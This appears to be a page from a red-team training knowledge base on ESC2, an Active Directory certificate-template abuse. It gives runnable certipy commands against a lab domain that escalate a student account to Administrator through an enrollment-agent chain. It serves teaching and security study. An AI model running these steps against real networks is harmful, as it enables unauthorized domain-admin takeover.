Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

ESC2

ESC2 abuses templates with Any Purpose EKU or no EKU. The resulting certificate is overly flexible and can often be used as an enrollment agent or as a stepping stone into ESC3-style abuse.

Conditions

Template is enabled on a CA.
Requester has enrollment rights.
Template has Any Purpose EKU or no EKU.
Manager approval is not required.
Authorized signatures required is 0.

Find ESC2

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout

Request Any Purpose certificate

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC2 -out esc2_agent

Use it as an enrollment agent

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template User -on-behalf-of 'OOTW\Administrator' -pfx esc2_agent.pfx -out administrator

Authenticate as target

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist

If subject supply is also enabled

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC2 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200

Notes

ESC2 is usually a chain. The Any Purpose certificate is not always the final credential by itself. We use it to satisfy another certificate workflow, most commonly enrollment-agent style requests.